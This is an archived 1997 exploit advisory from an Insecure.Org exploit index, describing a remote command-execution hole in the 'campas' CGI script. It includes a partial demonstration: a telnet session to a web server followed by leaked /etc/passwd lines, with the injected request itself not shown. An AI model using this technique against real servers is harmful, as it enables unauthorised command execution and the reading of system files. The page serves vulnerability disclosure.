A hole very similar to the standard phf hole alows people to execute arbitrary commands through the campus cgi.
Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO>
Execute arbitrary commands remotely as the owner of the cgi-running process (commonly nobody or daemon).
Those running a vulnerable version of the campus cgi. Version 1.2 is vulnerable. It may be distributed with the NCSA server.
15 July 1997
Date: Tue, 15 Jul 1997 18:24:31 -0500
From: Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO>
Subject: Bug CGI campas
CAMPAS SECURITY BUG
ET Lownoise Colombia 1997
#pragma ident "@(#)campas.sh 1.2 95/05/24 NCSA"
Impact: Execute commands
> telnet www.xxxx.net 80
Connected to venus.xxxx.net
Escape character is '^]'.
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P
Solution: 1-If u dont use it erase it.!
2-Dont use it again.. (go point 1)
Well another line to put in vito.ini.
ET LOwnoise 1997 Colombia
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: